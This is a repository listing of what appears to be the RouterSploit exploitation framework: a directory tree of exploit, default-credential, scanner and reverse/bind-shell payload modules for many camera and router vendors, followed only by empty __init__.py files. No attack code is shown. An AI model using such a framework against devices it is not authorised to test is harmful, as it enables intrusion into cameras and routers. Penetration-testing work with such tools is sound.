├── tests ├── __init__.py ├── core │ └── __init__.py ├── creds │ ├── __init__.py │ ├── cameras │ │ ├── __init__.py │ │ ├── acti │ │ │ ├── __init__.py │ │ │ └── test_ssh_default_creds.py │ │ ├── avtech │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── axis │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── basler │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── canon │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── cisco │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── dlink │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── jvc │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── speco │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── vacron │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── arecont │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── avigilon │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── brickcom │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── geovision │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── grandstream │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── hikvision │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── honeywell │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── iqinvision │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── mobotix │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── samsung │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── sentry360 │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── siemens │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── stardot │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── videoiq │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ └── american_dynamics │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ ├── routers │ │ ├── __init__.py │ │ ├── 2wire │ │ │ └── __init__.py │ │ ├── 3com │ │ │ └── __init__.py │ │ ├── asmax │ │ │ ├── __init__.py │ │ │ ├── test_ssh_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── asus │ │ │ └── __init__.py │ │ ├── belkin │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── bhu │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── cisco │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── dlink │ │ │ └── __init__.py │ │ ├── huawei │ │ │ └── __init__.py │ │ ├── ipfire │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── netsys │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── tplink │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── zte │ │ │ └── __init__.py │ │ ├── zyxel │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_ssh_default_creds.py │ │ ├── billion │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── comtrend │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── fortinet │ │ │ └── __init__.py │ │ ├── juniper │ │ │ └── __init__.py │ │ ├── linksys │ │ │ └── __init__.py │ │ ├── mikrotik │ │ │ ├── __init__.py │ │ │ ├── test_api_ros_default_creds.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── movistar │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── netcore │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ ├── netgear │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_ssh_default_creds.py │ │ ├── pfsense │ │ │ ├── __init__.py │ │ │ └── test_ssh_default_creds.py │ │ ├── technicolor │ │ │ └── __init__.py │ │ ├── thomson │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ ├── test_ssh_default_creds.py │ │ │ └── test_telnet_default_creds.py │ │ └── ubiquiti │ │ │ ├── __init__.py │ │ │ ├── test_ftp_default_creds.py │ │ │ └── test_ssh_default_creds.py │ └── generic │ │ ├── test_snmp_bruteforce.py │ │ ├── test_http_basic_digest_default.py │ │ ├── test_http_basic_digest_bruteforce.py │ │ ├── test_ftp_default.py │ │ ├── test_ssh_default.py │ │ ├── test_telnet_default.py │ │ ├── test_ftp_bruteforce.py │ │ ├── test_ssh_bruteforce.py │ │ └── test_telnet_bruteforce.py ├── encoders │ ├── __init__.py │ ├── perl │ │ └── __init__.py │ ├── php │ │ └── __init__.py │ └── python │ │ └── __init__.py ├── exploits │ ├── __init__.py │ ├── misc │ │ ├── __init__.py │ │ ├── miele │ │ │ └── __init__.py │ │ └── wepresent │ │ │ └── __init__.py │ ├── cameras │ │ ├── __init__.py │ │ ├── avigilon │ │ │ └── __init__.py │ │ ├── brickcom │ │ │ └── __init__.py │ │ ├── cisco │ │ │ └── __init__.py │ │ ├── dlink │ │ │ └── __init__.py │ │ ├── jovision │ │ │ └── __init__.py │ │ ├── multi │ │ │ └── __init__.py │ │ ├── mvpower │ │ │ └── __init__.py │ │ ├── siemens │ │ │ ├── __init__.py │ │ │ └── test_cvms2025_credentials_disclosure.py │ │ ├── xiongmai │ │ │ ├── __init__.py │ │ │ └── test_uc_httpd_path_traversal.py │ │ └── honeywell │ │ │ └── __init__.py │ └── routers │ │ ├── __init__.py │ │ ├── bhu │ │ └── __init__.py │ │ ├── zte │ │ └── __init__.py │ │ ├── 2wire │ │ └── __init__.py │ │ ├── 3com │ │ └── __init__.py │ │ ├── asmax │ │ └── __init__.py │ │ ├── asus │ │ ├── __init__.py │ │ └── test_rt_n16_password_disclosure.py │ │ ├── belkin │ │ ├── __init__.py │ │ ├── test_auth_bypass.py │ │ └── test_g_n150_password_disclosure.py │ │ ├── billion │ │ └── __init__.py │ │ ├── cisco │ │ ├── __init__.py │ │ ├── test_ucm_info_disclosure.py │ │ ├── test_dpc2420_info_disclosure.py │ │ └── test_secure_acs_bypass.py │ │ ├── comtrend │ │ └── __init__.py │ │ ├── dlink │ │ ├── __init__.py │ │ ├── test_dir_815_850l_rce.py │ │ ├── test_dir_300_320_615_auth_bypass.py │ │ ├── test_dsl_2750b_info_disclosure.py │ │ ├── test_dwl_3200ap_password_disclosure.py │ │ ├── test_dir_300_320_600_615_info_disclosure.py │ │ ├── test_dsl_2730b_2780b_526b_dns_change.py │ │ ├── test_dwr_932b_backdoor.py │ │ └── test_dir_645_815_rce.py │ │ ├── huawei │ │ ├── __init__.py │ │ └── test_hg530_hg520b_password_disclosure.py │ │ ├── ipfire │ │ └── __init__.py │ │ ├── linksys │ │ ├── __init__.py │ │ ├── test_eseries_themoon_rce.py │ │ └── test_smartwifi_password_disclosure.py │ │ ├── mikrotik │ │ └── __init__.py │ │ ├── movistar │ │ └── __init__.py │ │ ├── multi │ │ └── __init__.py │ │ ├── netcore │ │ └── __init__.py │ │ ├── netgear │ │ └── __init__.py │ │ ├── netsys │ │ └── __init__.py │ │ ├── shuttle │ │ └── __init__.py │ │ ├── thomson │ │ ├── __init__.py │ │ └── test_twg850_password_disclosure.py │ │ ├── tplink │ │ └── __init__.py │ │ ├── zyxel │ │ ├── __init__.py │ │ └── test_d1000_wifi_password_disclosure.py │ │ └── technicolor │ │ ├── __init__.py │ │ ├── test_tg784_authbypass.py │ │ ├── test_tc7200_password_disclosure.py │ │ └── test_dwg855_authbypass.py ├── generic │ └── __init__.py └── payloads │ ├── __init__.py │ ├── armle │ └── __init__.py │ ├── cmd │ ├── __init__.py │ ├── test_netcat_bind_tcp.py │ ├── test_awk_bind_tcp.py │ ├── test_awk_bind_udp.py │ ├── test_netcat_reverse_tcp.py │ ├── test_bash_reverse_tcp.py │ ├── test_awk_reverse_tcp.py │ ├── test_php_reverse_tcp.py │ └── test_perl_bind_tcp.py │ ├── mipsbe │ └── __init__.py │ ├── mipsle │ └── __init__.py │ ├── php │ └── __init__.py │ ├── python │ └── __init__.py │ ├── x64 │ └── __init__.py │ └── x86 │ └── __init__.py ├── routersploit ├── __init__.py ├── core │ ├── __init__.py │ ├── ftp │ │ └── __init__.py │ ├── ssh │ │ └── __init__.py │ ├── tcp │ │ └── __init__.py │ ├── udp │ │ └── __init__.py │ ├── http │ │ └── __init__.py │ ├── snmp │ │ └── __init__.py │ ├── telnet │ │ └── __init__.py │ ├── bluetooth │ │ ├── __init__.py │ │ └── btle │ │ │ └── __init__.py │ └── exploit │ │ ├── exceptions.py │ │ └── encoders.py ├── libs │ ├── __init__.py │ ├── lzs │ │ └── __init__.py │ └── apiros │ │ └── __init__.py ├── modules │ ├── __init__.py │ ├── encoders │ │ ├── __init__.py │ │ ├── php │ │ │ ├── __init__.py │ │ │ ├── hex.py │ │ │ └── base64.py │ │ ├── python │ │ │ ├── __init__.py │ │ │ ├── hex.py │ │ │ └── base64.py │ │ └── perl │ │ │ ├── hex.py │ │ │ └── base64.py │ ├── exploits │ │ ├── __init__.py │ │ ├── misc │ │ │ ├── __init__.py │ │ │ ├── asus │ │ │ │ └── __init__.py │ │ │ ├── miele │ │ │ │ └── __init__.py │ │ │ └── wepresent │ │ │ │ └── __init__.py │ │ ├── cameras │ │ │ ├── __init__.py │ │ │ ├── avigilon │ │ │ │ └── __init__.py │ │ │ ├── brickcom │ │ │ │ └── __init__.py │ │ │ ├── cisco │ │ │ │ └── __init__.py │ │ │ ├── dlink │ │ │ │ └── __init__.py │ │ │ ├── jovision │ │ │ │ └── __init__.py │ │ │ ├── multi │ │ │ │ └── __init__.py │ │ │ ├── mvpower │ │ │ │ └── __init__.py │ │ │ ├── siemens │ │ │ │ └── __init__.py │ │ │ ├── xiongmai │ │ │ │ └── __init__.py │ │ │ ├── grandstream │ │ │ │ └── __init__.py │ │ │ └── honeywell │ │ │ │ └── __init__.py │ │ ├── generic │ │ │ └── __init__.py │ │ └── routers │ │ │ ├── __init__.py │ │ │ ├── bhu │ │ │ └── __init__.py │ │ │ ├── zte │ │ │ └── __init__.py │ │ │ ├── 2wire │ │ │ └── __init__.py │ │ │ ├── 3com │ │ │ └── __init__.py │ │ │ ├── asmax │ │ │ └── __init__.py │ │ │ ├── asus │ │ │ └── __init__.py │ │ │ ├── belkin │ │ │ └── __init__.py │ │ │ ├── billion │ │ │ └── __init__.py │ │ │ ├── cisco │ │ │ └── __init__.py │ │ │ ├── comtrend │ │ │ └── __init__.py │ │ │ ├── dlink │ │ │ └── __init__.py │ │ │ ├── fortinet │ │ │ └── __init__.py │ │ │ ├── huawei │ │ │ └── __init__.py │ │ │ ├── ipfire │ │ │ └── __init__.py │ │ │ ├── linksys │ │ │ └── __init__.py │ │ │ ├── mikrotik │ │ │ └── __init__.py │ │ │ ├── movistar │ │ │ └── __init__.py │ │ │ ├── multi │ │ │ └── __init__.py │ │ │ ├── netcore │ │ │ └── __init__.py │ │ │ ├── netgear │ │ │ └── __init__.py │ │ │ ├── netsys │ │ │ └── __init__.py │ │ │ ├── shuttle │ │ │ └── __init__.py │ │ │ ├── thomson │ │ │ └── __init__.py │ │ │ ├── tplink │ │ │ └── __init__.py │ │ │ ├── ubiquiti │ │ │ └── __init__.py │ │ │ ├── zyxel │ │ │ └── __init__.py │ │ │ └── technicolor │ │ │ └── __init__.py │ ├── generic │ │ ├── __init__.py │ │ ├── upnp │ │ │ └── __init__.py │ │ └── bluetooth │ │ │ └── __init__.py │ ├── payloads │ │ ├── __init__.py │ │ ├── armle │ │ │ └── __init__.py │ │ ├── cmd │ │ │ ├── __init__.py │ │ │ ├── bash_reverse_tcp.py │ │ │ ├── php_bind_tcp.py │ │ │ ├── perl_bind_tcp.py │ │ │ ├── php_reverse_tcp.py │ │ │ ├── python_bind_udp.py │ │ │ ├── python_bind_tcp.py │ │ │ ├── perl_reverse_tcp.py │ │ │ ├── python_reverse_udp.py │ │ │ └── python_reverse_tcp.py │ │ ├── mipsbe │ │ │ └── __init__.py │ │ ├── mipsle │ │ │ └── __init__.py │ │ ├── perl │ │ │ └── __init__.py │ │ ├── php │ │ │ └── __init__.py │ │ ├── python │ │ │ └── __init__.py │ │ ├── x64 │ │ │ └── __init__.py │ │ └── x86 │ │ │ └── __init__.py │ ├── scanners │ │ ├── __init__.py │ │ ├── misc │ │ │ ├── __init__.py │ │ │ └── misc_scan.py │ │ ├── cameras │ │ │ ├── __init__.py │ │ │ └── camera_scan.py │ │ └── routers │ │ │ ├── __init__.py │ │ │ └── router_scan.py │ └── creds │ │ ├── cameras │ │ ├── __init__.py │ │ ├── acti │ │ │ └── __init__.py │ │ ├── avtech │ │ │ └── __init__.py │ │ ├── axis │ │ │ └── __init__.py │ │ ├── basler │ │ │ └── __init__.py │ │ ├── canon │ │ │ └── __init__.py │ │ ├── cisco │ │ │ └── __init__.py │ │ ├── dlink │ │ │ └── __init__.py │ │ ├── jvc │ │ │ └── __init__.py │ │ ├── speco │ │ │ └── __init__.py │ │ ├── vacron │ │ │ └── __init__.py │ │ ├── arecont │ │ │ └── __init__.py │ │ ├── avigilon │ │ │ └── __init__.py │ │ ├── brickcom │ │ │ └── __init__.py │ │ ├── geovision │ │ │ └── __init__.py │ │ ├── grandstream │ │ │ └── __init__.py │ │ ├── hikvision │ │ │ └── __init__.py │ │ ├── honeywell │ │ │ └── __init__.py │ │ ├── iqinvision │ │ │ └── __init__.py │ │ ├── mobotix │ │ │ └── __init__.py │ │ ├── samsung │ │ │ └── __init__.py │ │ ├── sentry360 │ │ │ └── __init__.py │ │ ├── siemens │ │ │ └── __init__.py │ │ ├── stardot │ │ │ └── __init__.py │ │ ├── videoiq │ │ │ └── __init__.py │ │ └── american_dynamics │ │ │ └── __init__.py │ │ ├── generic │ │ └── __init__.py │ │ ├── printers │ │ └── __init__.py │ │ ├── routers │ │ ├── __init__.py │ │ ├── 2wire │ │ │ └── __init__.py │ │ ├── 3com │ │ │ └── __init__.py │ │ ├── asmax │ │ │ └── __init__.py │ │ ├── asus │ │ │ └── __init__.py │ │ ├── belkin │ │ │ └── __init__.py │ │ ├── bhu │ │ │ └── __init__.py │ │ ├── cisco │ │ │ └── __init__.py │ │ ├── dlink │ │ │ └── __init__.py │ │ ├── huawei │ │ │ └── __init__.py │ │ ├── ipfire │ │ │ └── __init__.py │ │ ├── netsys │ │ │ └── __init__.py │ │ ├── tplink │ │ │ └── __init__.py │ │ ├── zte │ │ │ └── __init__.py │ │ ├── zyxel │ │ │ └── __init__.py │ │ ├── billion │ │ │ └── __init__.py │ │ ├── comtrend │ │ │ └── __init__.py │ │ ├── fortinet │ │ │ └── __init__.py │ │ ├── juniper │ │ │ └── __init__.py │ │ ├── linksys │ │ │ └── __init__.py │ │ ├── mikrotik │ │ │ └── __init__.py │ │ ├── movistar │ │ │ └── __init__.py │ │ ├── netcore │ │ │ └── __init__.py │ │ ├── netgear │ │ │ └── __init__.py │ │ ├── pfsense │ │ │ └── __init__.py │ │ ├── technicolor │ │ │ └── __init__.py │ │ ├── thomson │ │ │ └── __init__.py │ │ └── ubiquiti │ │ │ └── __init__.py │ │ └── __init__.py └── resources │ ├── __init__.py │ ├── ssh_keys │ ├── exagrid-cve-2016-1561.json │ ├── f5-bigip-cve-2012-1493.json │ ├── ceragon-fibeair-cve-2015-0936.json │ ├── vagrant.json │ ├── quantum-dxi-v1000.json │ ├── array-networks-vapv-vxag.json │ ├── barracuda_load_balancer_vm.json │ ├── monroe-dasdec-cve-2013-0137.json │ ├── loadbalancer.org-enterprise-va.json │ ├── quantum-dxi-v1000.key │ ├── array-networks-vapv-vxag.key │ ├── barracuda_load_balancer_vm.key │ ├── monroe-dasdec-cve-2013-0137.key │ └── loadbalancer.org-enterprise-va.key │ └── wordlists │ └── __init__.py ├── requirements.txt ├── .dockerignore ├── MANIFEST.in ├── Dockerfile ├── requirements-dev.txt ├── .travis ├── run.sh └── install.sh ├── .travis.yml ├── docs └── modules │ ├── encoders │ ├── php │ │ ├── hex.md │ │ └── base64.md │ ├── perl │ │ ├── hex.md │ │ └── base64.md │ └── python │ │ ├── hex.md │ │ └── base64.md │ └── payloads │ └── cmd │ ├── netcat_bind_tcp.md │ ├── awk_bind_udp.md │ ├── awk_bind_tcp.md │ ├── bash_reverse_tcp.md │ └── netcat_reverse_tcp.md └── .github ├── ISSUE_TEMPLATE.md └── PULL_REQUEST_TEMPLATE.md /tests/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/core/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/encoders/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/generic/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/ftp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/ssh/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/tcp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/udp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/libs/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/libs/lzs/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/encoders/perl/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/encoders/php/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/encoders/python/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/misc/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/armle/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/cmd/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/mipsbe/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/mipsle/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/php/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/python/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/x64/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/payloads/x86/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/http/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/snmp/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/telnet/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/libs/apiros/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/resources/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/acti/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/avtech/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/axis/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/basler/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/canon/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/jvc/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/speco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/vacron/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/2wire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/3com/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/asmax/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/asus/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/belkin/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/bhu/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/huawei/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/ipfire/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/netsys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/tplink/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/zte/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/zyxel/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/cameras/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/misc/miele/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/bhu/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/exploits/routers/zte/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/core/bluetooth/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/exploits/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/generic/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/payloads/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /routersploit/modules/scanners/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/arecont/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/avigilon/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/brickcom/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/geovision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/grandstream/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/hikvision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/honeywell/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/iqinvision/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/mobotix/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/samsung/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/sentry360/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/siemens/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/stardot/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/cameras/videoiq/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/billion/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/comtrend/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/fortinet/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/juniper/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/linksys/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/mikrotik/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/movistar/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/netcore/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/netgear/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/pfsense/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tests/creds/routers/technicolor/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- 